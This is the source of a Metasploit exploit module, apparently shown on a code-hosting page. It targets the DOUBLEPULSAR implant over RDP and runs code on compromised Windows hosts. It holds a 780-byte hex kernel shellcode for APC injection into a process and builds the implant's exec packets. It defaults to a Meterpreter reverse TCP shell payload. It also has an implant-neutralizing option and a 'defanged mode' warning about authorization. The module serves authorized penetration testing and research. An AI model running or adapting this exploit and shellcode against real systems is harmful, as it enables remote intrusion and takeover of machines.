Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = GreatRanking89include Msf::Exploit::Remote::RDP1011MAX_SHELLCODE_SIZE = 40961213def initialize(info = {})14super(update_info(info,15'Name' => 'RDP DOUBLEPULSAR Remote Code Execution',16'Description' => %q{17This module executes a Metasploit payload against the Equation Group's18DOUBLEPULSAR implant for RDP.1920While this module primarily performs code execution against the implant,21the "Neutralize implant" target allows you to disable the implant.22},23'Author' => [24'Equation Group', # DOUBLEPULSAR implant25'Shadow Brokers', # Equation Group dump26'Luke Jennings', # DOPU analysis and detection27'wvu', # RDP DOPU analysis and module28'Tom Sellers', # RDP DOPU analysis29'Spencer McIntyre' # RDP DOPU analysis30],31'References' => [32['URL', 'https://github.com/countercept/doublepulsar-detection-script']33],34'DisclosureDate' => '2017-04-14', # Shadow Brokers leak35'License' => MSF_LICENSE,36'Platform' => 'win',37'Arch' => ARCH_X64,38'Privileged' => true,39'Payload' => {40'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,41'DisableNops' => true42},43'Targets' => [44['Execute payload (x64)',45'DefaultOptions' => {46'EXITFUNC' => 'thread',47'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'48}49],50['Neutralize implant',51'DefaultOptions' => {52'PAYLOAD' => nil # XXX: "Unset" generic payload53}54]55],56'DefaultTarget' => 0,57'Notes' => {58'AKA' => ['DOUBLEPULSAR'],59'RelatedModules' => ['exploit/windows/smb/smb_doublepulsar_rce'],60'Stability' => [CRASH_OS_DOWN],61'Reliability' => [REPEATABLE_SESSION],62'SideEffects' => []63}64))6566register_advanced_options([67OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),68OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])69])70end7172OPCODES = {73exec: 0x01,74ping: 0x02,75burn: 0x0376}.freeze7778DOUBLEPULSAR_MAGIC = 0x192837447980# https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_osversioninfoexw81def parse_doublepulsar_ping(res)82return unless res && res.length == 2888384magic, _size, major, minor, build = res.unpack('V5')85sp_major, _sp_minor, _suites, prod, arch = res[-8..-1].unpack('v3C2')8687return unless magic == DOUBLEPULSAR_MAGIC8889ver_str = "#{major}.#{minor}.#{build}"90sp_str = "SP#{sp_major}"9192prod_str =93case prod94when 195'Workstation'96when 297'Domain Controller'98when 399'Server'100end101102arch_str =103case arch104when 1105'x86'106when 2107'x64'108end109110"Windows #{prod_str} #{ver_str} #{sp_str} #{arch_str}"111end112113def setup114super115116rdp_connect117is_rdp, server_selected_protocol = rdp_check_protocol118119fail_with(Failure::BadConfig, 'Target port is not RDP') unless is_rdp120121case server_selected_protocol122when RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX123fail_with(Failure::BadConfig, 'DOUBLEPULSAR does not support NLA')124when RDPConstants::PROTOCOL_SSL125vprint_status('Swapping plain socket to SSL')126swap_sock_plain_to_ssl127end128rescue Rex::ConnectionError, RdpCommunicationError => e129fail_with(Failure::Disconnected, e.message)130end131132def cleanup133rdp_disconnect134135super136end137138def check139print_status('Sending ping to DOUBLEPULSAR')140res = do_rdp_doublepulsar_pkt(OPCODES[:ping])141142unless (info = parse_doublepulsar_ping(res))143print_error('DOUBLEPULSAR not detected or disabled')144return CheckCode::Safe145end146147print_warning('DOUBLEPULSAR RDP IMPLANT DETECTED!!!')148print_good("Target is #{info}")149CheckCode::Vulnerable150end151152def exploit153if datastore['DefangedMode']154warning = <<~EOF155156157Are you SURE you want to execute code against a nation-state implant?158You MAY contaminate forensic evidence if there is an investigation.159160Disable the DefangedMode option if you have authorization to proceed.161EOF162163fail_with(Failure::BadConfig, warning)164end165166# No ForceExploit because check is accurate167unless check == CheckCode::Vulnerable168fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')169end170171case target.name172when 'Execute payload (x64)'173print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")174shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])175shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)176vprint_status("Total shellcode length: #{shellcode.length} bytes")177178print_status('Sending shellcode to DOUBLEPULSAR')179res = do_rdp_doublepulsar_pkt(OPCODES[:exec], shellcode)180when 'Neutralize implant'181return neutralize_implant182end183184if res185fail_with(Failure::UnexpectedReply, 'Unexpected response from implant')186end187188print_good('Payload execution successful')189end190191def neutralize_implant192print_status('Neutralizing DOUBLEPULSAR')193res = do_rdp_doublepulsar_pkt(OPCODES[:burn])194195if res196fail_with(Failure::UnexpectedReply, 'Unexpected response from implant')197end198199print_good('Implant neutralization successful')200end201202def do_rdp_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)203rdp_send_recv(make_rdp_mcs_doublepulsar(opcode, body))204rescue Errno::ECONNRESET, RdpCommunicationError205nil206end207208=begin209MULTIPOINT-COMMUNICATION-SERVICE T.125210DomainMCSPDU: channelJoinConfirm (15)211channelJoinConfirm212result: rt-domain-not-hierarchical (2)213initiator: 14120214requested: 6402215=end216def make_rdp_mcs_doublepulsar(opcode, body)217data = "\x3c" # channelJoinConfirm218data << [DOUBLEPULSAR_MAGIC].pack('V')219data << [opcode].pack('v')220221if body222data << [body.length, body.length, 0].pack('V*')223data << body224end225226build_data_tpdu(data)227end228229# ring3 = user mode encoded payload230# proc_name = process to inject APC into231def make_kernel_user_payload(ring3, proc_name)232sc = make_kernel_shellcode(proc_name)233234sc << [ring3.length].pack('S<')235sc << ring3236237sc238end239240def generate_process_hash(process)241# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm242proc_hash = 0243process << "\x00"244245process.each_byte do |c|246proc_hash = ror(proc_hash, 13)247proc_hash += c248end249250[proc_hash].pack('l<')251end252253def ror(dword, bits)254(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF255end256257def make_kernel_shellcode(proc_name)258# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm259# Length: 780 bytes260"\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" \261"\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" \262"\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" \263"\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" \264"\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" \265"\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" \266"\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" \267"\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" \268"\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" \269"\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" \270"\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" \271"\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" \272"\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" +273generate_process_hash(proc_name.upcase) +274"\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" \275"\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" \276"\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" \277"\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" \278"\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" \279"\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" \280"\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" \281"\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" \282"\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" \283"\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" \284"\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" \285"\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" \286"\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" \287"\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" \288"\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" \289"\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" \290"\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" \291"\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" \292"\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" \293"\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" \294"\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" \295"\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" \296"\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \297"\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" \298"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" \299"\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" \300"\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" \301"\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" \302"\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" \303"\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" \304"\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" \305"\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" \306"\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" \307"\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" \308"\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" \309"\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3"310end311312def kernel_shellcode_size313make_kernel_shellcode('').length314end315316end317318319